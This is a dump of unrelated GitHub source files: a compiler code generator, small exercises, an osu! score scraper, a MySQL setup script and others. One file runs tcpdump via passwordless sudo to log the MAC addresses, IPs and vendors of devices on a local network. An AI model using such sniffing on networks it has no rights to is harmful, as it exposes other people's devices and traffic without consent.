key, val in self.memory.items():\n if key == lexeme:\n self.semantic_stack.append(val)\n return\n if void_type:\n err_msg = f\"{line_no}: Semantic Error! Illegal type of void for {lexeme}.\"\n self.semantic_errors.append(err_msg)\n return\n t = self.find_func_addr()\n sym = {'addr': t, 'data_type': 'void' if void_type else 'int'}\n if self.arg_declarating:\n self.temp_args.append([lexeme, sym])\n else:\n if not 'vars' in self.symbol_table[self.function]:\n self.symbol_table[self.function]['vars'] = {}\n sym = {lexeme: sym}\n self.symbol_table[self.function]['vars'].update(sym)\n self.semantic_stack.append(t)\n else:\n for key, val in self.memory.items():\n if key == lexeme:\n self.semantic_stack.append(val)\n return\n if lexeme == 'output':\n self.calling_function.append(lexeme)\n return\n addr = self.find_addr()\n self.memory.update({lexeme: addr})\n sym = {'addr': addr, 'data_type': 'void' if void_type else 'int', 'args': {}, 'vars': {}}\n self.symbol_table.update({lexeme: sym})\n self.add_to_program_block(f'(ASSIGN, #0, {addr}, )')\n self.semantic_stack.append(addr)\n\n def var(self, args):\n void_type = args[0]\n lexeme = args[1]\n line_no = args[2]\n if void_type:\n err_msg = f\"{line_no}: Semantic Error! Illegal type of void for {lexeme}.\"\n self.semantic_errors.append(err_msg)\n del self.symbol_table[lexeme]\n return\n if self.function:\n self.symbol_table[self.function]['vars'][lexeme].update({'type': 'var'})\n else:\n self.symbol_table[lexeme].update({'type': 'var'})\n\n def pnum(self, arg):\n num_addr = self.get_temp()\n self.add_to_program_block(f'(ASSIGN, #{arg}, {num_addr}, )')\n self.temp.update({num_addr: arg})\n self.semantic_stack.append(num_addr)\n\n def array_address(self, arg=None):\n index = self.semantic_stack.pop()\n var_addr = self.semantic_stack.pop()\n t = self.get_temp()\n self.add_to_program_block(f'(MULT, {index}, #4, {t})')\n self.add_to_program_block(f'(ADD, #{var_addr}, {t}, {t})')\n self.semantic_stack.append('@' + str(t))\n # self.temp.update({t: var_addr + 4*int(self.temp[index])})\n\n def assign(self, arg=None):\n pprint(self.symbol_table)\n op2 = self.semantic_stack.pop()\n op1 = self.semantic_stack.pop()\n self.add_to_program_block(f'(ASSIGN, {op2}, {op1}, )')\n # t = self.get_temp()\n self.semantic_stack.append(op1)\n # self.temp[t] = op1\n\n def whil(self, arg=None):\n i = len(self.program_block)\n self.program_block[self.semantic_stack[-1]] = f'(JPF, {self.semantic_stack[-2]}, {i + 1}, )'\n self.add_to_program_block(f'(JP, {self.semantic_stack[-3] + 1}, , )')\n # self.add_to_program_block('')\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n self.break_stack.pop()\n\n def add(self, arg=None):\n op1 = self.semantic_stack.pop()\n operation = self.semantic_stack.pop()\n op2 = self.semantic_stack.pop()\n t = self.get_temp()\n self.semantic_stack.append(t)\n if operation == '+':\n self.add_to_program_block(f'(ADD, {op1}, {op2}, {t})')\n else:\n self.add_to_program_block(f'(SUB, {op2}, {op1}, {t})')\n\n def mult(self, arg=None):\n op1 = self.semantic_stack.pop()\n op2 = self.semantic_stack.pop()\n t = self.get_temp()\n self.semantic_stack.append(t)\n self.add_to_program_block(f'(MULT, {op1}, {op2}, {t})')\n\n def save(self, arg=None):\n pb_ind = len(self.program_block)\n self.semantic_stack.append(pb_ind)\n self.add_to_program_block('')\n\n def jpf(self, arg=None):\n pb_ind = self.semantic_stack.pop()\n if_exp = self.semantic_stack.pop()\n i = len(self.program_block)\n print(self.program_block)\n\n self.program_block[pb_ind] = f'(JPF, {if_exp}, {i + 1},)'\n self.semantic_stack.append(i)\n self.add_to_program_block('')\n\n def jp(self, arg=None):\n pb_ind = self.semantic_stack.pop()\n i = len(self.program_block)\n self.program_block[pb_ind] = f'(JP, {i}, ,)'\n\n def label(self, arg=None):\n self.break_stack.append('while')\n pb_ind = len(self.program_block) - 1\n self.semantic_stack.append(pb_ind)\n\n def relop(self, arg=None):\n op_2 = self.semantic_stack.pop()\n operand = self.semantic_stack.pop()\n op_1 = self.semantic_stack.pop()\n t = self.get_temp()\n self.semantic_stack.append(t)\n if operand == '==':\n self.add_to_program_block(f'(EQ, {op_1}, {op_2}, {t})')\n elif operand == '<':\n self.add_to_program_block(f'(LT, {op_1}, {op_2}, {t})')\n\n def relop_sign(self, arg):\n self.semantic_stack.append(arg)\n\n def sign(self, arg):\n self.semantic_stack.append(arg)\n\n def signed_num(self, arg=None):\n n = self.semantic_stack.pop()\n sign = self.semantic_stack.pop()\n if self.temp.__contains__(n):\n number = int(self.temp[n])\n if sign == '-':\n self.pnum(-number)\n else:\n self.pnum(number)\n else:\n if self.fun_declarating:\n for key, value in self.symbol_table[self.function][\"args\"]:\n if value['addr'] == n:\n number = value['addr']\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n return\n for key, value in self.symbol_table[self.function][\"vars\"].items():\n if value['addr'] == n:\n number = value['addr']\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n return\n for key, val in self.memory.items():\n if value['addr'] == n:\n number = value['addr']\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n return\n else:\n for key, val in self.memory.items():\n if val == n:\n number = val\n t = self.get_temp()\n self.semantic_stack.append(t)\n if sign == '-':\n self.add_to_program_block(f'(MULT, {number}, #-1, {t})')\n else:\n self.add_to_program_block(f'(MULT, {number}, #1, {t})')\n\n\n def save_program_block(self):\n with open('output.txt', 'w') as output:\n for i, block in enumerate(self.program_block):\n output.write(f'{i}\\t{block}\\n')\n\n def pop(self, arg=None):\n self.semantic_stack.pop()\n\n def output(self, arg=None):\n to_print = self.semantic_stack.pop()\n self.semantic_stack.append(None)\n self.add_to_program_block(f'(PRINT, {to_print}, , )')\n\n\n def save_arr(self, args):\n void_type = args[0]\n lexeme = args[1]\n size = args[2]\n line_no = args[3]\n index = self.semantic_stack.pop()\n if len(self.calling_function) > 0:\n self.symbol_table[self.function]['vars'][lexeme].update({'type': 'arr'})\n for i in range(1, int(self.temp[index])):\n self.add_to_program_block(f'(ASSIGN, #0, {self.func_memory_cur}, )')\n self.func_memory_cur += 4\n else:\n self.symbol_table[lexeme].update({'type': 'arr'})\n for i in range(1, int(self.temp[index])):\n self.add_to_program_block(f'(ASSIGN, #0, {self.cur_mem_addr}, )')\n self.cur_mem_addr += 4\n if void_type:\n err_msg = f\"{line_no}: Semantic Error! Illegal type of void for {lexeme}.\"\n self.semantic_errors.append(err_msg)\n del self.symbol_table[lexeme]\n return\n\n\n def tmp_save(self, arg=None):\n self.break_stack.append('switch')\n print('break stacke now', self.break_stack)\n i = len(self.program_block)\n self.add_to_program_block(f'(JP, {i + 2}, ,)')\n self.add_to_program_block('')\n self.semantic_stack.append(i + 1)\n\n def cmp_save(self, arg=None):\n t = self.get_temp()\n op1 = self.semantic_stack.pop()\n op2 = self.semantic_stack[-1]\n self.add_to_program_block(f'(EQ, {op1}, {op2}, {t})')\n self.semantic_stack.append(t)\n self.add_to_program_block('')\n i = len(self.program_block)\n self.semantic_stack.append(i - 1)\n\n def jp_break(self, line_no):\n print('now we are in break ~~~~~~~~', self.break_stack)\n if len(self.break_stack) == 0:\n err_msg = f\"{line_no}: Semantic Error! No 'while' or 'switch' found for 'break'\"\n self.semantic_errors.append(err_msg)\n break_top = self.break_stack[-1]\n if break_top == 'switch':\n self.add_to_program_block(f'(JP, {self.semantic_stack[-4]}, ,)')\n else: #todo here for break in while loops\n self.add_to_program_block(f'(JP, {self.semantic_stack[-2]}, ,)')\n\n def jpf_switch(self, arg=None):\n ind = self.semantic_stack[-1]\n i = len(self.program_block)\n self.program_block[ind] = f'(JPF, {self.semantic_stack[-2]}, {i} ,)'\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n\n def jp_switch(self, arg=None):\n i = len(self.program_block)\n ind = self.semantic_stack[-2]\n self.program_block[ind] = f'(JP, {i}, ,)'\n self.semantic_stack.pop()\n self.semantic_stack.pop()\n self.break_stack.pop()\n\n def function_call(self, arg):\n print('~~~~~~',self.calling_function)\n if self.calling_function[-1] == 'output':\n self.output()\n return\n address = self.symbol_table[self.calling_function[-1]]['addr']\n return_address = self.symbol_table[self.calling_function[-1]]['return_address']\n self.add_to_program_block(f'(ASSIGN, #{len(self.program_block) + 2}, {return_address}, )')\n self.add_to_program_block(f'(JP, {address}, , )')\n if self.function_arg_number != len(self.symbol_table[self.calling_function[-1]]['args']):\n err_msg = f\"{arg}: semantic error! Mismatch in numbers of arguments of {self.calling_function[-1]}\"\n self.semantic_errors.append(err_msg)\n return\n if self.symbol_table[self.calling_function[-1]]['data_type'] == 'void':\n self.semantic_stack.append(None)\n else:\n return_value = self.symbol_table[self.calling_function[-1]]['return_value']\n self.semantic_stack.append(return_value)\n self.function_arg_number = 0\n self.calling_function.pop()\n self.function = self.callers.pop()\n\n\n def arg(self, arg=None):\n if not self.function or ((not self.callers or self.callers[-1] != 'main') and self.fun_declarating):\n return\n st = self.symbol_table[self.calling_function[-1]]\n if len(st[\"args\"]) == self.function_arg_number:\n err_msg = f\"{arg}: semantic error! Mismatch in numbers of arguments of {self.calling_function[-1]}\"\n self.semantic_errors.append(err_msg)\n return\n value_address = self.semantic_stack.pop()\n address = st['args'][self.function_arg_number][1]['addr']\n self.add_to_program_block(f'(ASSIGN, {value_address}, {address}, )')\n self.function_arg_number += 1\n\n def arg_declaration(self, arg):\n lexeme = arg\n self.arg_declarating = True\n self.fun_declarating = True\n self.function = self.temp_id\n if self.function != 'main':\n self.semantic_stack.append(len(self.program_block))\n self.program_block.append(None)\n t = self.find_func_addr()\n self.symbol_table[self.function].update({'return_value': t})\n t = self.find_func_addr()\n self.symbol_table[self.function].update({'return_address': t})\n\n def fun_declaration(self, arg):\n lexeme = arg\n if not self.function:\n return\n self.symbol_table[lexeme].update({'type': 'func'})\n\n def fun_declaration_end(self, arg=None):\n if not self.function:\n return\n self.fun_declarating = False\n address = self.symbol_table[self.function]['return_address']\n self.add_to_program_block(f'(JP, @{address}, , )')\n if self.function != 'main':\n st = self.semantic_stack.pop()\n self.program_block[st] = f'(JP, {len(self.program_block)}, , )'\n self.symbol_table[self.function].update({'type': 'func'})\n self.function = None\n\n def param_arr(self, arg=None):\n self.temp_args[-1][-1].update({'type': 'arr'})\n if self.arg_declarating:\n self.semantic_stack.pop()\n\n def param_var(self, arg=None):\n self.temp_args[-1][-1].update({'type': 'var'})\n if self.arg_declarating:\n self.semantic_stack.pop()\n\n def fun_declarated(self, args):\n if not self.function:\n return\n self.symbol_table[self.function].update({'args': self.temp_args, 'addr': len(self.program_block)})\n self.arg_declarating = False\n self.temp_args = []\n\n def return_stmt(self, arg=None):\n if self.symbol_table[self.function]['data_type'] == 'void':\n return_address = self.symbol_table[self.function]['return_address']\n self.add_to_program_block(f'(JP, @{return_address}, , )')\n return\n t = self.symbol_table[self.function]['return_value']\n l = self.semantic_stack.pop()\n self.add_to_program_block(f'(ASSIGN, {l}, {t}, )')\n return_address = self.symbol_table[self.function]['return_address']\n self.add_to_program_block(f'(JP, @{return_address}, , )')\n\n\n\n def add_to_program_block(self, str):\n print('------------------->>', str, 'added.')\n self.program_block.append(str)\n\n# arg type check\n\n\n# temp_args = [\n# [arg, {'addr': 2, 'data_type': 'void/int', 'type': 'var/arr'}],\n# [arg, {'addr': 2, 'data_type': 'void/int', 'type': 'var/arr'}],\n# ]\n\n# test 1: 1 func done\n# test 2: 1 func done\n# test 3: switch, 1 func done\n# test 4: while break, inner func\n# test 5: array argument, 1 func\n# test 6: 1 func done\n# test 7: switch, 1 func done\n# test 8: 1 func, global arr used in func done\n# test 9: inner func, array argument\n# test 10: while break, inner func\n","repo_name":"maghasemzadeh/C-minus-compiler","sub_path":"codegen.py","file_name":"codegen.py","file_ext":"py","file_size_in_byte":19617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"75091107331","text":"# ライブラリのインポート\n#import re #正規表現\n#import sys\n#import heapq\nimport collections\n\n\ndef main():\n n, q = map(int, input().split())\n deq = collections.deque()\n for i in range(n):\n name, time = input().split()\n deq.append((int(time),name))\n ans = []\n elps = 0\n while deq:\n time, name = deq.popleft()\n if time <= q:\n elps += time\n ans.append((name, elps))\n else:\n elps += q\n deq.append((time-q, name))\n [print(*i) for i in ans]\n \n\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"kmatsura/jouhousuurikagakuensyuu2","sub_path":"dai4kai/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72170317574","text":"import datetime\nimport logging\nimport os\nimport time\n\nimport pymongo\nimport requests\nimport schedule\nfrom pymongo.collection import Collection\n\nlogger = logging.getLogger('user_update')\nlogger.setLevel(os.getenv('LOG_LEVEL', 'INFO').upper())\nloggers_formatter = logging.Formatter(\n '%(asctime)s | %(levelname)s | %(process)d | %(name)s | %(funcName)s | %(message)s',\n datefmt='%d/%m/%Y %I:%M:%S')\n\nch = logging.StreamHandler()\nch.setFormatter(loggers_formatter)\nlogger.addHandler(ch)\nlogger.propagate = False\n\n\nclass OsuApi:\n def __init__(self, client_id, client_secret):\n self._client_id = client_id\n self._client_secret = client_secret\n\n self._base_url = 'https://osu.ppy.sh/api/v2/'\n self._last_request_time = datetime.datetime.now() - datetime.timedelta(hours=1000)\n self._cooldown = datetime.timedelta(seconds=1)\n\n self._auth_header = self._authorize()\n\n def _authorize(self) -> dict:\n data = {'client_id': self._client_id,\n 'client_secret': self._client_secret,\n 'grant_type': 'client_credentials',\n 'scope': 'public'}\n\n with requests.post('https://osu.ppy.sh/oauth/token', json=data) as r:\n response = r.json()\n\n access_token = response['access_token']\n\n return {'Authorization': f'Bearer {access_token}'}\n\n def get_top_std_players(self, page=1):\n params = {'page': page}\n response = self._get_endpoint('rankings/osu/performance', params)\n return response['ranking']\n\n def get_top_scores_of_player(self, user_id):\n params = {'mode': 'osu',\n 'limit': 50}\n top_scores = []\n top_scores.extend(self._get_endpoint(f'users/{user_id}/scores/best', params))\n params = {'mode': 'osu',\n 'limit': 50,\n 'offset': 50}\n top_scores.extend(self._get_endpoint(f'users/{user_id}/scores/best', params))\n return top_scores\n\n def _get_endpoint(self, endpoint, params=None):\n time_now = datetime.datetime.now()\n if time_now < self._last_request_time + self._cooldown:\n wait_for = (self._last_request_time + self._cooldown - time_now).total_seconds()\n time.sleep(wait_for)\n\n with requests.get(self._base_url + endpoint, params=params, headers=self._auth_header) as r:\n response = r.json()\n\n self._last_request_time = time_now\n return response\n\n\ndef insert_scores_routine(osu_api: OsuApi, scores_collection: Collection):\n logger.info(f'Started insert_scores_routine()!')\n for page_num in range(1, 21):\n top_players = osu_api.get_top_std_players(page=page_num)\n logger.info(f'Looking at page {page_num} of performance rankings.')\n\n for player_details in top_players:\n player_user_id = player_details['user']['id']\n player_scores = osu_api.get_top_scores_of_player(player_user_id)\n\n db_scores = []\n for score in player_scores:\n score['_id'] = score['id']\n if scores_collection.find_one({'_id': score['id']}):\n continue\n db_scores.append(score)\n if len(db_scores) != 0:\n logger.info(f'Inserting scores for {player_details[\"user\"][\"username\"]}')\n scores_collection.insert_many(db_scores)\n else:\n logger.info(f'Skipping scores of {player_details[\"user\"][\"username\"]}...')\n\n\ndef initialize_db():\n client = pymongo.mongo_client.MongoClient(os.getenv(\"MONGO_URL\"))\n scores_collection: Collection = client.TopOneK.Scores\n scores_collection.create_index([(\"pp\", pymongo.DESCENDING)])\n scores_collection.create_index([(\"pp\", pymongo.ASCENDING)])\n scores_collection.create_index([(\"score\", pymongo.DESCENDING)])\n scores_collection.create_index([(\"score\", pymongo.ASCENDING)])\n scores_collection.create_index([(\"mods\", pymongo.ASCENDING)])\n scores_collection.create_index([(\"mods\", pymongo.DESCENDING)])\n scores_collection.create_index([(\"beatmap.$**\", 1)])\n scores_collection.create_index([(\"beatmapset.$**\", 1)])\n scores_collection.create_index([(\"user.$**\", 1)])\n return scores_collection\n\n\nif __name__ == '__main__':\n\n api = OsuApi(client_id=os.getenv(\"OSU_CLIENT_ID\"), client_secret=os.getenv(\"OSU_CLIENT_SECRET\"))\n collection = initialize_db()\n\n insert_scores_routine(api, collection)\n schedule.every().day.at(\"12:00\").do(insert_scores_routine, api, collection)\n while True:\n schedule.run_pending()\n logger.info(f'Waiting...')\n time.sleep(600)\n","repo_name":"aticie/osu-top-scores-update","sub_path":"update_scores.py","file_name":"update_scores.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1930821166","text":"# pip install mysql-connector-python\nimport mysql.connector\nimport os\nimport shutil\nimport sys\n\nroot = \".\"\n\n\ndef init_db():\n sql_file = os.path.join(root + \"/setup/app.sql\")\n\n if os.path.isfile(sql_file):\n if os.path.isfile(\"../app/src/System/db.php\") and input(\"Fetch credentials from local db.php? (y/n) \") == \"y\":\n print(\"Reading credentials from existing db.php...\")\n auth = {}\n with open(\"../app/src/System/db.php\", \"r\", encoding=\"utf-8\") as file:\n for line in file:\n if \"$_ENV\" in line:\n key, value = line[7:13], line[19:-3]\n if key == \"dbchar\":\n continue\n auth[key] = value\n print(key + \" => \" + value)\n print(\"Finished reading db.php.\")\n else:\n auth = {\n \"dbhost\": \"localhost\",\n \"dbname\": input(\"Database: \"),\n \"dbuser\": input(\"Username: \"),\n \"dbpass\": input(\"Password: \")\n }\n\n try:\n print(\"Connecting to database...\")\n connection = mysql.connector.connect(\n user=auth[\"dbuser\"],\n password=auth[\"dbpass\"],\n host=auth[\"dbhost\"],\n database=auth[\"dbname\"])\n if connection.is_connected():\n print(\"Connected to database '%s'!\" % auth[\"dbname\"])\n cursor = connection.cursor()\n\n rewrite_file(\"db.php\", auth, \"$_ENV\", \"dbchar\", \"utf-8\")\n\n if input(\"Drop database tables (if they exist)? (y/n) \") == \"y\":\n print(\"Dropping database tables...\")\n cursor.execute(\"DROP TABLE IF EXISTS `post_comments`, `posts`, `post_categories`;\")\n cursor.execute(\"DROP TABLE IF EXISTS `users`, `user_ranks`;\")\n print(\"Database tables dropped.\")\n else:\n print(\"Not dropping existing tables (if any).\")\n\n if input(\"Create database tables? (y/n) \") == \"y\":\n print(\"Creating database tables...\")\n parse_sql(sql_file, cursor, \";\", \"utf-8\")\n else:\n print(\"Database initialization skipped.\")\n\n except mysql.connector.Error as e:\n if \"Query was empty\" not in str(e):\n print(\"Database connection error: \", e)\n else:\n print(\"Finished parsing %s.\" % sql_file)\n\n finally:\n if \"connection\" in locals():\n if connection.is_connected():\n print(\"Closing database connection...\")\n cursor.close()\n connection.close()\n print(\"Connection closed.\")\n\n else:\n print(\"Error: \" + root + \"/setup/app.sql not found.\")\n\n\ndef init_files():\n files = {\n \"db.php\": \"../app/src/System/\",\n \"salt.php\": \"../app/src/System/\"\n }\n\n for filename, subdir in files.items():\n sub_dirs = subdir.split(\"/\")\n make_dir = sub_dirs[0] + \"/\"\n for dir_name in sub_dirs[1:]:\n make_dir += dir_name + \"/\"\n if not os.path.exists(os.path.join(root, make_dir)):\n os.mkdir(os.path.join(root, make_dir))\n\n target = os.path.join(root, subdir, filename)\n if not os.path.isfile(target):\n print(\"Couldn't find \" + filename + \". Creating...\")\n src = os.path.join(root + \"/setup/\" + filename[:-3] + \"default.php\")\n if os.path.isfile(src):\n shutil.copyfile(src, target)\n print(\"Success.\")\n else:\n print(\"Error: \" + root + \"/setup/\" + filename[:-3] + \"default.php not found.\")\n else:\n print(filename + \" already exists. Skipping...\")\n\n\ndef parse_sql(filename, cursor, delimiter, charset):\n file = open(filename, \"r\", encoding=charset)\n contents = file.read()\n file.close()\n queries = contents.split(delimiter)\n for query in queries:\n cursor.execute(query)\n\n\ndef rewrite_file(filename, data, array, skip, charset):\n if input(\"Save credentials to %s? (y/n) \" % filename) == \"y\":\n print(\"Writing credentials to %s.\" % filename)\n target_file = open(root + \"/../app/src/System/%s\" % filename, \"w\", encoding=charset)\n with open(root + \"/setup/%sdefault.php\" % filename[:-3], \"r\", encoding=charset) as source_file:\n for line in source_file:\n if array not in line or skip in line:\n target_file.write(line)\n else:\n for key, value in data.items():\n if key in line:\n target_file.write(array + \"['\" + key + \"'] = '\" + value + \"';\\n\")\n target_file.close()\n print(\"Finished writing to %s.\" % filename)\n else:\n print(\"Skipped writing to %s.\" % filename)\n\n\ndef main():\n if input(\"Create default files? (y/n) \") == \"y\":\n init_files()\n else:\n print(\"Default file creation skipped.\")\n\n if input(\"Establish MySQL connection? (y/n) \") == \"y\":\n init_db()\n else:\n print(\"MySQL connection skipped.\")\n\n print(\"All operations completed. Exiting...\")\n sys.exit()\n\n\nmain()\n","repo_name":"gregor-dietrich/skeletor","sub_path":"scripts/setup_full.py","file_name":"setup_full.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72358635973","text":"print(\"\"\"\n*********************************************\n\nBeden Kitle Endeksi Hesaplama\n\n*********************************************\n\"\"\")\n\nboy = float(input(\"Boyunuzu giriniz: \"))\nkilo = float(input(\"Kilonuzu giriniz: \"))\nbki = kilo / (boy ** 2)\nprint(\"Beden kitle endeksiniz: \", bki)\n\nif bki < 18.25:\n print(\"Zayıf\")\nelif 18.5 < bki < 25:\n print(\"Normal\")\nelif 25 < bki < 30:\n print(\"Fazla Kilolu\")\nelif bki > 30:\n print(\"Obez\")\nelse:\n print(\"Geçersiz boy ve kilo değerleri!\")","repo_name":"esenboga/pythonFirstProject","sub_path":"BedenKitleEndeksi2.py","file_name":"BedenKitleEndeksi2.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9579306148","text":"# 导入input_data这个类\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n# 从这个类里调用read_data_sets这个方法\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nx = tf.placeholder(tf.float32, [None, 784])\n\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\n\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\ny_ = tf.placeholder(tf.float32, [None, 10])\n\nsess = tf.InteractiveSession()\n\n# // 初始化所有变量\ntf.global_variables_initializer().run()\n\nsaver = tf.train.Saver(max_to_keep=1)\n\nmodel_file = tf.train.latest_checkpoint('ckpt/')\nsaver.restore(sess, model_file)\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nprint(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\n","repo_name":"1050035126/TestTensorFlow","sub_path":"BaseTest/test6_check.py","file_name":"test6_check.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16290786382","text":"import datetime\nimport json\nimport netaddr\nimport re\nimport subprocess\nimport signal\n\ncmd = ['sudo', '-n', 'tcpdump', '-e', '-n', '--immediate-mode', '-l']\n# cmd = ['/bin/sh', '-c', 'cat sniff2.log']\n\nprint(f'Running: {cmd}')\n\ndef render_timestamp(time):\n return {\n 'timestamp_epoch': time.timestamp(),\n 'timestamp_human': str(time),\n }\n\ndef write_log(mac_to_info, time):\n with open('sniffed.json', 'w') as f:\n data = {\n 'mac_addresses' : mac_to_info\n }\n data.update(render_timestamp(time))\n print(f'{data[\"timestamp_human\"]}: Writing log with {len(mac_to_info)} mac address entries.')\n json.dump(data, f, indent=2)\n\nHEX_DIGIT_PAIR=r'[0-9a-f]{2}'\nMAC_ADDRESS_REGEX = r':'.join([r'[0-9a-f]{2}']*6)\nIP_ADDRESS_REGEX = r'\\.'.join([r'[0-9]{1,3}']*4)\nPORT_OPTIONAL_REGEX = r'(?:\\.[0-9]{1,5})?'\nTIMESTAMP_REGEX = r'[0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{6}'\nLINE_REGEX=r'^'+TIMESTAMP_REGEX+r' (?P'+MAC_ADDRESS_REGEX+r') > (?P'+MAC_ADDRESS_REGEX+r'), (?:ethertype (?P[A-Za-z0-9]{2,6}))?.*?, length [0-9]{1,}: .*?(?P'+IP_ADDRESS_REGEX+r')'+PORT_OPTIONAL_REGEX+r' (?P[^ ]+) (?P'+IP_ADDRESS_REGEX+r')'+PORT_OPTIONAL_REGEX\n\noutput_received = False\nmac_to_info = {}\n\nlast_log_write = datetime.datetime.now()\nwrite_log(mac_to_info, last_log_write)\n\nwith subprocess.Popen(\n cmd,\n stderr=subprocess.DEVNULL,\n stdout=subprocess.PIPE\n ) as proc:\n\n while True:\n line = proc.stdout.readline()\n if not line:\n print('Polling to see if complete?')\n \n if proc.poll() == None:\n continue\n else:\n break\n\n if not output_received:\n output_received = True\n print(f'First output received from {cmd}')\n\n time_now = datetime.datetime.now()\n\n line = line.decode('utf-8')\n # print(line)\n match = re.match(LINE_REGEX, line)\n if match:\n params = match.groupdict()\n # print(params)\n for mac, ip in [\n (params['mac_from'], params['ip_to'] if params['operator'] == 'tell' else params['ip_from']),\n (params['mac_to'], params['ip_from'] if params['operator'] == 'tell' else params['ip_to'])\n ]:\n if ip.startswith('192.168.0.') and mac != 'ff:ff:ff:ff:ff:ff':\n if mac not in mac_to_info:\n try:\n organization = netaddr.EUI(mac).oui.registration().org\n except:\n organization = 'Unknown'\n \n mac_to_info[mac] = {\n 'ip_address': ip,\n 'mac_address': mac,\n 'organization': organization\n }\n mac_to_info[mac].update(render_timestamp(time_now))\n # print(line)\n # print(params)\n print(f'Sniffed {mac_to_info[mac]}')\n last_log_write = time_now\n write_log(mac_to_info, last_log_write)\n else:\n mac_to_info[mac].update(render_timestamp(time_now))\n else:\n if ' IPv6 ' not in line and line != '' and ' is-at ' not in line:\n # print(f'No match for: {line}')\n pass\n\n if time_now.timestamp() - last_log_write.timestamp() > 30:\n last_log_write = time_now\n write_log(mac_to_info, last_log_write)\n\n # NOTE: requires entry in /etc/sudoers:\n # = (root) NOPASSWD: /usr/sbin/tcpdump\n\n print(f'Complete: {cmd} with status code {proc.returncode}') \n\n # TODO: What's the returncode when it sudoers is not setup to allow it?\n\n\n\n \n \n","repo_name":"curious-attempt-bunny/network-sniffer","sub_path":"sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43801744475","text":"def optimal_time_table(timetable: list) -> list:\n \"\"\"\n :param timetable: [(9.0, 10.0), (9.3, 10.3), (10.0, 11.0), (10.3, 11.3)]\n :return: [(9.0, 10.0), (10.0, 11.0)]\n schedule with the largest number of lessons.\n \"\"\"\n\n timetable.sort(key=lambda x: (x[1], x[0]))\n new_timetable = []\n i = 0\n\n while i < len(timetable):\n if i == 0:\n new_timetable.append(timetable[i])\n i += 1\n continue\n\n if new_timetable[-1][1] <= timetable[i][0]:\n new_timetable.append(timetable[i])\n i += 1\n\n return new_timetable\n\n\n\n\n\n","repo_name":"Irina-Nazarova/algorithms_course","sub_path":"recursion/task_timetable.py","file_name":"task_timetable.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40348018510","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 31 21:12:47 2020\r\n\r\n@author: Sai Nidhi\r\n\"\"\"\r\n\r\nfrom flask import Flask, render_template\r\nimport requests\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n names = ['Shalini','deepti','sahas']\r\n date = []\r\n for i in names:\r\n url = \"https://hqzkbqq5d2.execute-api.ap-south-1.amazonaws.com/sanitizerretrieve?Name=\"+i\r\n resp = requests.get(url)\r\n data = resp.json()\r\n print(data)\r\n #[{'name': 'sandeep', 'date': '31-09-2020'}]\r\n date.append(data['Date'])\r\n return render_template('stats.html', p1= names[0],d1=date[0], p2=names[1], d2=date[1])\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=5000, debug=True)","repo_name":"DeeptiTeragunti/Smart_SanitizationMonitoringApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43122573194","text":"from fit.Parse import Parse\nfrom fit.Fixture import Fixture\nimport fit.TypeAdapter as TypeAdapter\n\nclass CellHandlerInspector(Fixture):\n def doTable(self, table):\n handlerList = TypeAdapter.getCurrentCellHandlerList()\n lastrow = table.parts\n for handler in handlerList:\n lastrow.more = Parse(tag=\"tr\",\n parts=Parse(tag=\"td\", body=handler.__class__.__name__))\n lastrow = lastrow.more\n","repo_name":"Apress/foundations-of-agile-python-dev","sub_path":"Chapter11/rsreader/tools/pyfit/fit/fit/CellHandlerInspector.py","file_name":"CellHandlerInspector.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"27815225207","text":"import threading\n\n\nclass MyClass(threading.Thread):\n def __init__(self, rank):\n super().__init__()\n self.rank = rank\n 